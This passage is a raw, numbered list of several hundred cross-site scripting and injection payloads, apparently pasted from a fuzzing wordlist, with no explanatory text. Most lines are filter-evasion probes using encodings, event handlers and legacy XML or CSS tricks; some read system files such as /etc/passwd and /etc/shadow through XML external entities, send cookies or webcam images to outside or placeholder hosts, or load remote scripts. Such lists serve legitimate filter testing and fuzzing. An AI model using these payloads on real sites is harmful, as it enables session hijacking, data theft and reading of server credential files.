  6803. &#x0003C
  6804. &#X0003c;
  6805. &#X0003c
  6806. &#X0003C;
  6807. &#X0003C
  6808. &#x0003e;
  6809. &#x0003e
  6810. &#x0003E;
  6811. &#x0003E
  6812. &#X0003e;
  6813. &#X0003e
  6814. &#X0003E;
  6815. &#X0003E
  6816. &#x003c;
  6817. &#x003c
  6818. &#x003C;
  6819. &#x003C
  6820. &#X003c;
  6821. &#X003c
  6822. &#X003C;
  6823. &#X003C
  6824. &#x003c;img src=1 onerror=confirm(1)&#x003e;
  6825. &#x003e;
  6826. &#x003e
  6827. &#x003E;
  6828. &#x003E
  6829. &#X003e;
  6830. &#X003e
  6831. &#X003E;
  6832. &#X003E
  6833. <\x00img src=’1' onerror=alert(0) />
  6834. →<! — — \x00> <img src=xxx:x onerror=javascript:alert(1)> →
  6835. “‘`><\x00img src=xxx:x onerror=javascript:alert(1)>
  6836. ‘`”><\x00script>javascript:alert(1)</script>
  6837. \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
  6838. &#x03c;
  6839. &#x03c
  6840. &#x03C;
  6841. &#x03C
  6842. &#X03c;
  6843. &#X03c
  6844. &#X03C;
  6845. &#X03C
  6846. &#x03e;
  6847. &#x03e
  6848. &#x03E;
  6849. &#x03E
  6850. &#X03e;
  6851. &#X03e
  6852. &#X03E;
  6853. &#X03E
  6854. <x%09onxxx=1
  6855. <x%09onxxx=1
  6856. <x%09onxxx=142
  6857. <x~%0Aonfocus=alert(26) id=a tabindex=0>
  6858. <x%0Aonxxx=1
  6859. <x%0Aonxxx=1
  6860. <x%0Aonxxx=143
  6861. [\x0B]onmosemove=confirm(‘\Done\’)>
  6862. <x%0Conxxx=1
  6863. <x%0Conxxx=1
  6864. <x%0Conxxx=144
  6865. <x%0Donxxx=1
  6866. <x%0Donxxx=1
  6867. <x%0Donxxx=145
  6868. (X,)=>1
  6869. /x:1/:///%01javascript:alert(document.cookie)/
  6870. <x 1=’1'onxxx=1
  6871. <x 1=’1'onxxx=1
  6872. <x 1=”1"onxxx=1
  6873. <x 1=’1'onxxx=147
  6874. <x 1=”1"onxxx=148
  6875. <x 1=”>” onxxx=1
  6876. <x 1=”>” onxxx=1
  6877. <x 1=”>” onxxx=150
  6878. →<! — — \x21> <img src=xxx:x onerror=javascript:alert(1)> →
  6879. x%22%3E%3Cimg%20src=%22x%22%3E%3C! — %2522%2527 — %253E%253CSvg%2520O%256ELoad%253Dconfirm%2528/xss/%2529%253E
  6880. \x27-confirm`1`-\x27
  6881. <x%2F1=”>%22OnXxx%3D1
  6882. <x%2Fonxxx=1
  6883. <x%2Fonxxx=1
  6884. <x%2Fonxxx=146
  6885. \x3c
  6886. &#x3c;
  6887. &#x3c
  6888. \x3C
  6889. &#x3C;
  6890. &#x3C
  6891. &#X3c;
  6892. &#X3c
  6893. &#X3C;
  6894. &#X3C
  6895. “‘`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
  6896. \x3cimg\u0020src=1\u0020onerror=alert(1)\x3e
  6897. \x3Cimg\u0020src=1\u0020onerror=alert(1)\x3e
  6898. ‘`”><\x3Cscript>javascript:alert(1)</script>
  6899. ‘`”><\x3Cscript>javascript:alert(1)</script>
  6900. \x3Cscript>javascript:alert(1)</script>
  6901. \x3csVg/<sVg/oNloAd=alert()//>\x3e
  6902. &#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x78;&#x73;&#x73;&#x27;&#x29;&#x3c;&#x2f;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3e;
  6903. X3dwbm9uY2U9JysvY2UiIHZhbHVlPSIoW14iXSo/KSIvLmV4ZWMoeC
  6904. \x3e
  6905. &#x3e;
  6906. &#x3e
  6907. \x3E
  6908. &#x3E;
  6909. &#x3E
  6910. &#X3e;
  6911. &#X3e
  6912. &#X3E;
  6913. &#X3E
  6914. <! — \x3E<img src=xxx:x onerror=javascript:alert(1)> →
  6915. →<! — — \x3E> <img src=xxx:x onerror=javascript:alert(1)> →
  6916. &#x60;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;&#x97;&#x108;&#x101;&#x114;&#x116;&#x40;&#x39;&#x120;&#x115;&#x115;&#x39;&#x41;&#x60;&#x47;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;
  6917. &#x60;&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;&#x97;&#x108;&#x101;&#x114;&#x116;&#x40;&#x39;&#x120;&#x115;&#x115;&#x39;&#x41;&#x60;&#x&#x115;&#x99;&#x114;&#x105;&#x112;&#x116;&#x62;
  6918. \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
  6919. <x %6Fnerror=confirm(133)
  6920. <x %6Fnxxx=1
  6921. <x %6Fnxxx=1
  6922. &#x74;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;&#x141;&#x154;&#x145;&#x162;&#x164;&#x50;&#x47;&#x170;&#x163;&#x163;&#x47;&#x51;&#x74;&&#x57;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;
  6923. &#x74;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;&#x141;&#x154;&#x145;&#x162;&#x164;&#x50;&#x47;&#x170;&#x163;&#x163;&#x47;&#x51;&#x74;&#x57;&#x163;&#x143;&#x162;&#x151;&#x160;&#x164;&#x76;
  6924. “>/XaDoS/><script>alert(document.cookie)</script>
  6925. “>/XaDoS/><script>alert(document.cookie)</script><script src=”http://www.site.com/XSS.js"></script>
  6926. x”);$=alert, $(1);//
  6927. !{x(){alert(1)}}.x()
  6928. xa?</title><img src%3dx onerror%3dconfirm(1)>
  6929. [\xC0][\xBC]script>alert(‘XSS’);[\xC0][\xBC]/script>
  6930. [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
  6931. x=’c2.drawImage(v,0,0,640,480);fetch(“//HOST/”+c2.canvas.toDataURL())’;
  6932. x=c2.drawImage(v,0,0,640,480);fetch(//HOST/+c2.canvas.toDataURL());
  6933. [][x=’constructor’][x](‘alert(1)’)()
  6934. <x contenteditable onblur=alert(108)>lose focus!
  6935. <x contenteditable onblur=alert(1)>lose focus!
  6936. <x contenteditable onblur=alert(1)>lose focus!
  6937. <x contenteditable onfocus=alert(115)>focus this!
  6938. <x contenteditable onfocus=alert(1)>focus this!
  6939. <x contenteditable onfocus=alert(1)>focus this!
  6940. <x contenteditable oninput=alert(116)>input here!
  6941. <x contenteditable oninput=alert(1)>input here!
  6942. <x contenteditable oninput=alert(1)>input here!
  6943. <x contenteditable onkeydown=alert(117)>press any key!
  6944. <x contenteditable onkeydown=alert(1)>press any key!
  6945. <x contenteditable onkeydown=alert(1)>press any key!
  6946. <x contenteditable onkeypress=alert(118)>press any key!
  6947. <x contenteditable onkeypress=alert(1)>press any key!
  6948. <x contenteditable onkeypress=alert(1)>press any key!
  6949. <x contenteditable onkeyup=alert(119)>press any key!
  6950. <x contenteditable onkeyup=alert(1)>press any key!
  6951. <x contenteditable onkeyup=alert(1)>press any key!
  6952. <x contenteditable onpaste=alert(125)>paste here!
  6953. <x contenteditable onpaste=alert(1)>paste here!
  6954. <x contextmenu=”>”><a/value=”aaaaaaaaa”/onmousemove=%0Dprompt(196)%0A>#x
  6955. <x data-bind=”.:confirm(1)”>
  6956. <x data-bind=”.:&#x5cu0061lert(1)”>
  6957. x=’ev’+’al’
  6958. x=eval
  6959. ��x:expr/**/ession(alert(1))��
  6960. x:expr/**/ession(alert(1))
  6961. x.fillText(“ASCII”,C=0,40)
  6962. x.fillText(“Xo= “[C],t*54,Y*22)
  6963. x.fillText(“Xw=^ “[C],t*54,Y*22)
  6964. x.font=”3em’”
  6965. x.font=”3em A”
  6966. <x ‘=”foo”><x foo=’><img src=x onerror=alert(1)//’>
  6967. <x ‘=”foo”><x foo=’><img src=x onerror=javascript:alert(1)//’>
  6968. xlink:href=”javascript:alert(49)”>CLICKME</maction> </math>
  6969. x=(lol=alert(1),x=class x extends x{constructor(){alert(1)}}()()()()())
  6970. x=(lol=alert(1),x=class x extends x{constructor(){alert(1)}}()()()()())=>class x extends x{}()()();x()
  6971. <xml id=cdcat><note><to>%26lt;span style=x:exp<![CDATA[r]]>ession(confirm(3))%26gt;hello%26lt;/span%26gt;</to></note></xml><table border=%221%22 datasrc=%22%23cdcat%22><tr><td><span datafld=%22to%22 DATAFORMATAS=html></span></td></tr></table>
  6972. <XML ID=I><X><C><![CDATA[<IMG id=XSS SRC=”javas]]<![CDATA[cript:alert(‘XSS’);”>]]</C><X></xml>
  6973. <xml ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]>
  6974. <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=”;javas]]>;<;![CDATA[cript:alert(‘;XSS’;);”;>;]]>;
  6975. <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]>
  6976. <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(XSS);”>]]>
  6977. <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
  6978. <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]> </C></X></xml><SPAN DATASRC=#IDATAFLD=C DATAFORMATAS=HTML></SPAN>
  6979. <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]><![CDATA[cript:alert(XSS);”>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  6980. <XML ID=I><X><C><![CDATA[<IMG SRC=”javas]]<![CDATA[cript:javascript:alert(1);”>]]</C><X></xml>
  6981. <XML ID=I><X><C><![<IMG SRC=”javas]]<![cript:document.vulnerable=true;”>]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
  6982. <xml id=”X”><a><b><script>alert(‘XSS’);</script>;<b></a></xml>
  6983. <xml id=”X”><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
  6984. <XML ID=”XSS”><I><B><IMG id=XSS SRC=”javas<! — →cript:alert(‘XSS’)”></B></I></XML><SPAN DATAid=XSS SRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  6985. <XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:alert(XSS^
  6986. <;XML ID=”;xss”;>;<;I>;<;B>;<;IMG SRC=”;javas<;! — →;cript:alert(‘;XSS’;)”;>;<;/B>;<;/I>;<;/XML>;
  6987. <XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:alert(‘XSS’)”></B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  6988. <XML ID=”xss”><I><B><IMG SRC=”javas<! — →cript:document.vulnerable=true”></B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></span>
  6989. <XML ID=”xss”><I><B>&lt;IMG SRC=”javas<! — 
  6990. <XML ID=”xss”><I><B>&lt;IMG SRC=”javas<! — →cript:alert(‘XSS’)”&gt;</B></I></XML>
  6991. <xml ID=”xss”><I><B>&lt;IMG SRC=”javas<! — →cript:alert(‘XSS’)”&gt;</B></I></xml><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  6992. <xml id=”xss” src=”%(htc)s”></xml> <label dataformatas=”html” datasrc=”#xss” datafld=”payload”></label>
  6993. <XML id=XSS SRC=”http://xxxx.com/xsstest.xml" ID=I></XML>
  6994. <XML id=XSS SRC=”xsstest.xml” ID=I></XML><SPAN DATAid=XSS SRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  6995. <XML id=XSS><X><C><![CDATA[<IMG id=XSS SRC=”javas]]><![CDATA[cript:alert(‘XSS’);”>]]></C></X><xml><SPAN DATAid=XSS SRC=#I DATAFLD=CDATAFORMATAS=HTML></SPAN>
  6996. <xml:namespace prefix=t><import namespace=t implementation=…..
  6997. <?xml:namespace prefix=”t” ns=”urn:schemas-microsoft-com:time”>
  6998. xmlns=”http://www.w3.org/2000/svg"><defs><font id=”x”><font-face font-family=”y”/></font></defs></svg>
  6999. xmlns:x=”http://w3.org/1999/xhtml “>alert(1&#00000041;
  7000. <xml onPropertyChange xml onPropertyChange=”javascript:javascript:alert(1)”></xml onPropertyChange>
  7001. <;XML SRC=”;http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
  7002. <XML SRC=”http://ha.ckers.org/xsstest.xml" ID=I></XML>
  7003. <XML SRC=”http://ha.ckers.org/xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  7004. <XML src=”javascript:alert(‘X11SS’);”>
  7005. <XML SRC=”javascript:alert(‘XSS’);”>
  7006. <XML SRC=”javascript:alert(“XSS”)
  7007. <xml src=”javascript:document.vulnerable=true;”>
  7008. <XML SRC=”xsstest.xml” ID=I></XML>
  7009. <XML SRC=”xsstest.xml” ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  7010. <XML SRC=”xsstest.xml” ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  7011. <?xml-stylesheet href=”javascript:alert(1)”?><root/>
  7012. <?xml-stylesheet type=”text/css”?><!DOCTYPE x SYSTEM “test.dtd”><x>&x;</x>
  7013. <?xml-stylesheet type=”text/css”?><root style=”x:expression(write(1))”/>
  7014. <?xml-stylesheet type=”text/css”?><root style=”x:expression(write(1))”/>
  7015. <?xml-stylesheet type=”text/css”?><root style=”x:expression(write(1))”/> // Works in IE7 ? http://html5sec.org/#77
  7016. <?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file://c:/boot.ini”>]><foo>&xee;</foo>
  7017. <?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file:///dev/random”>]><foo>&xee;</foo>
  7018. <?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file:///etc/passwd”>]><foo>&xee;</foo>
  7019. <?xml version=”1.0" encoding=”ISO-8859–1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM “file:///etc/shadow”>]><foo>&xee;</foo>
  7020. <?xml version=”1.0" encoding=”ISO-8859–1"?><foo><![CDATA[‘ or 1=1 or ‘’=’]]></foof>
  7021. <?xml version=”1.0" encoding=”ISO-8859–1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘gotcha’);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
  7022. <?xml version=”1.0" encoding=”ISO-8859–1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘XSS’);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
  7023. <?xml version=”1.0" encoding=”utf-8" ?><x:script
  7024. <?xml version=”1.0"?><html:html xmlns:html=’http://www.w3.org/1999/xhtml'>
  7025. <?xml version=”1.0"?><html:html xmlns:html=’http://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html>
  7026. <?xml version=”1.0"?><html:html xmlns:html=’http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
  7027. <?xml version=”1.0"?><html><script xmlns=”http://www.w3.org/1999/xhtml">alert(1)</script></html>
  7028. <?xml version=”1.0"?><html><script xmlns=”http://www.w3.org/1999/xhtml">alert(8)</script></html>
  7029. <?xml version=”1.0"?><script xmlns=”http://www.w3.org/1999/xhtml">alert(9)</script>
  7030. <?xml version=”1.0" ?><someElement><a xmlns:a=’http://www.w3.org/1999/xhtml'><a:body onload=’alert(1)’/></a></someElement>
  7031. <?xml version=”1.0" ?><someElement> <a xmlns:a=’http://www.w3.org/1999/xhtml'><a:body onload=’alert(1)’/></a></someElement>
  7032. <?xml version=”1.0" standalone=”no”?><!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload=”alert(1)”
  7033. <?xml version=”1.0" standalone=”no”?><!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload=”alert(1)” xmlns=”http://www.w3.org/2000/svg"><defs><font id=”x”><font-face font-family=”y”/></font></defs></svg>
  7034. <?xml version=”1.0"?><x:script xmlns:x=”http://www.w3.org/1999/xhtml">alert(27&#x29;</x:script>
  7035. <xmp><img alt=”</xmp><img src=xx:x onerror=alert(1)//”>
  7036. <xmp><img alt=”</xmp><img src=xx:x onerror=confirm(1)//”>
  7037. <xmp><%</xmp><img alt=’%></xmp><img src=xx:x onerror=alert(1)//’>
  7038. x=new class extends Function{}(‘alert(1)’);
  7039. x=new class extends Function{}(‘alert(1)’);x=new x;
  7040. x=new x;
  7041. x=new XMLHttpRequest()
  7042. x = new XMLHttpRequest();
  7043. <x o%6Eerror=prompt(134)
  7044. <x o%6Exxx=1
  7045. <x o%6Exxx=1
  7046. <x on%78error=confirm(135)
  7047. <x on%78xx=1
  7048. <x on%78xx=1
  7049. <x onafterscriptexecute=alert(127)>
  7050. <x onbeforescriptexecute=alert(128)>
  7051. <x onclick=alert(109)>click this!
  7052. <x onclick=alert(1)>click this!
  7053. <x onclick=alert(1)>click this!
  7054. <x oncontextmenu=alert(111)>right click this!
  7055. <x oncontextmenu=alert(1)>right click this!
  7056. <x oncontextmenu=alert(1)>right click this!
  7057. <x oncopy=alert(110)>copy this!
  7058. <x oncopy=alert(1)>copy this!
  7059. <x oncopy=alert(1)>copy this!
  7060. <x oncut=alert(112)>copy this!
  7061. <x oncut=alert(1)>copy this!
  7062. <x oncut=alert(1)>copy this!
  7063. <x+oncut=y=prompt,y`1`>renwax23
  7064. <x oncut=y=prompt,y``>z
  7065. <x ondblclick=alert(113)>double click this!
  7066. <x ondblclick=alert(1)>double click this!
  7067. <x ondblclick=alert(1)>double click this!
  7068. <x ondrag=alert(114)>drag this!
  7069. <x ondrag=alert(1)>drag this!
  7070. <x ondrag=alert(1)>drag this!
  7071. <x onerror%3Dprompt(136)
  7072. <x onload’=confirm(1)
  7073. <x onmousedown=alert(120)>click this!
  7074. <x onmousedown=alert(1)>click this!
  7075. <x onmousedown=alert(1)>click this!
  7076. <x onmouseenter=alert(126)>hover me!
  7077. <x onmousemove=alert(121)>hover this!
  7078. <x onmousemove=alert(1)>hover this!
  7079. <x onmousemove=alert(1)>hover this!
  7080. <x onmouseout=alert(122)>hover this!
  7081. <x onmouseout=alert(1)>hover this!
  7082. <x onmouseout=alert(1)>hover this!
  7083. <x onmouseover=alert(1)>
  7084. <x onmouseover=alert(123)>hover this!
  7085. <x onmouseover=alert(1)>hover this!
  7086. <x onmouseover=alert(1)>hover this!
  7087. <x onmouseup=alert(124)>click this!
  7088. <x onmouseup=alert(1)>click this!
  7089. <x onmouseup=alert(1)>click this!
  7090. x.onreadystatechange=function(){if(this.readyState==4){write(x.responseText)}}”
  7091. <x onwebkitanimationend=alert(74)><style>X{animation:S}@keyframes S{}
  7092. <x </onxxx=1
  7093. <x </onxxx=1
  7094. <x/onxxx=1
  7095. <x/onxxx=1
  7096. <x OnXxx=1
  7097. <x OnXxx=1
  7098. <X onxxx=1
  7099. <X onxxx=1
  7100. <X OnXxx=1
  7101. <X OnXxx=1
  7102. <X onxxx=137
  7103. <x OnXxx=138
  7104. <X OnXxx=139
  7105. <x onxxx=140 onxxx=1400
  7106. <x/onxxx=141
  7107. <x </onxxx=149
  7108. <x onxxx=1 onxxx=1
  7109. <x onxxx%3D1
  7110. <x onxxx=alert(1) 1=’
  7111. <x onxxx=alert(152) 152=’
  7112. x.open(‘GET’,p+f,0)
  7113. x.open(POST, home.php, true);
  7114. ?x=<script%20src=data:&x=alert(1);>
  7115. “><<x>script>confirm(2)<<x>/<x>script>
  7116. x’\”></script><img src=x onerror=alert(1)>
  7117. <x:script xmlns:x=”https://sql--injection.blogspot.co.uk">alert('xss');</x:script>
  7118. <x:script xmlns:x=”http://www.w3.org/1999/xhtml">alert(1);</x:script>
  7119. <x:script xmlns:x=”http://www.w3.org/1999/xhtml">alert('xss');</x:script>
  7120. x.send()
  7121. x.send(post=</textarea><br><a href= + document.URL + >Check this!</a>);
  7122. x.setRequestHeader(Content-type, application/x-www-form-urlencoded);
  7123. x setter=eval,x=1
  7124. ;! — “<XSS>=&{()}”
  7125. // XSS //
  7126. ‘;’;;! — “;<;XSS>;=&;{()}
  7127. ‘’;! — “<XSS>=&{()}
  7128. xss:&#101;x&#x2F;*XSS*//*/* ?/pression(alert(“XSS”))’>
  7129. xss:&#101;x&#x2F;*XSS*//**pression(alert(“XSS”))’>
  7130. /?xss=500); alert(document.cookie);//
  7131. xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\”XSS\”))’&gt;
  7132. !#$%&’*+-/=?^@xss.cx”>_`{}|~@xss.cx
  7133. xss:expression(alert(/Xss/)
  7134. xss:expression(alert(/Xss-By-Muhaddi/)
  7135. {}*{xss:expression(open(alert(1)))}
  7136. xss:ex/*XSS*//*/*/pression(alert(“XSS”))’>
  7137. <! XSS=”><img src=xx:x onerror=alert(1)//”>
  7138. <! XSS=”><img src=xx:x onerror=confirm(1)//”>
  7139. [XSS](javascript:confirm(6))
  7140. <xss><script>alert(‘WXSS’)</script></vulnerable>
  7141. xss →<! — <script>xss
  7142. <XSS STYLE=”behavior: url(%(htc)s);”>
  7143. <;XSS STYLE=”;behavior: url(http://ha.ckers.org/xss.htc);";>;
  7144. <XSS STYLE=”behavior: url(http://ha.ckers.org/xss.htc);">
  7145. <XSS STYLE=”behavior: url(xss.htc);”>
  7146. <~/XSS STYLE=xss:expression(alert(‘XSS’))>
  7147. <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
  7148. <;XSS STYLE=”;xss:expression(alert(‘;XSS’;))”;>;
  7149. </XSS STYLE=xss:expression(alert(‘XSS’))>
  7150. </XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
  7151. <XSS STYLE=”xss:expression(alert(‘XSS’))”>
  7152. <XSS STYLE=xss:e/**/xpression(alert(‘XSS’))>
  7153. <XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
  7154. XSS STYLE=xss:e/**/xpression(alert(‘XSS’))>
  7155. XSS/*-*/STYLE=xss:e/**/xpression(alert(‘XSS’))>
  7156. <XSS STYLE=”xss:expression(document.vulnerable=true)”>
  7157. <XSS STYLE=”xss:expression(javascript:alert(1))”>
  7158. <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
  7159. <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=”http://www.procheckup.com/?sid="%2bdocument.cookie)>
  7160. <xss:xss>XSS</xss:xss>
  7161. <xss:xss>XSS</xss:xss></HTML>”””,”XML namespace.”),(“””<XML ID=”xss”><I><B>&lt;IMG SRC=”javas<! — →cript:javascript:alert(1)”&gt;</B></I></XML><SPAN DATASRC=”#xss” DATAFLD=”B” DATAFORMATAS=”HTML”></SPAN>
  7162. <x style=”background:url(‘x&#1;;color:red;/*’)”>XXX</x>
  7163. <x style=”background:url(‘x[a];color:red;/*’)”>XXX</x>
  7164. <x style=”background:url(‘x ;color:red;/*’)”>XXX</x>
  7165. <x style=”behavior:url(%(sct)s)”>
  7166. <x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>
  7167. x=this[x]
  7168. x</title><img src%3dx onerror%3dalert(1)>
  7169. x��</title><img src%3dx onerror%3dalert(1)>
  7170. x=’\x61\x6c\x65\x72\x74\x28\x31\x29';new Function(x)()
  7171. x=x=>{}/alert(1)/+alert(2)
  7172. <x xmlns=”http://www.w3.org/2001/xml-events" event=”load” observer=”foo” handler=”data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar”/>
  7173. <x xmlns:xlink=”http://www.w3.org/1999/xlink" xlink:actuate=”onLoad” xlink:href=”javascript:alert(1)” xlink:type=”simple”/>
  7174. X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
  7175. (X=_=>`(X=${X})()`)()
  7176. XXX<style>*[‘<! — ‘]{}</style> →{}*{color:red}</style>
  7177. x=x=>x=>x=>x=>x=>x=>x=>alert(1);x()()()()()()()()
  7178. x(x(y))
  7179. x(y)
  7180. {{x = {‘y’:’’.constructor.prototype}; x[‘y’].charAt=[].join;$eval(‘x=alert(1)’);}}
  7181. xyz onerror=alert(6);
  7182. y=<a>alert</a>;content[y](123)
  7183. y=’nam’+$$
  7184. y=’na’+’me’
  7185. y=name
  7186. y=x(y)
  7187. ‘“()=<z>
  7188. z=d.createElement(“script”);
  7189. z=d.createElement(“script”);z.src=”//HOST:PORT”;
  7190. ZeroClipboard.swf?id=\”))} catch(e) {alert(1);}//&width=1000&height=1000
  7191. z.src=”//HOST:PORT”;
Add Comment
Please, Sign In to add comment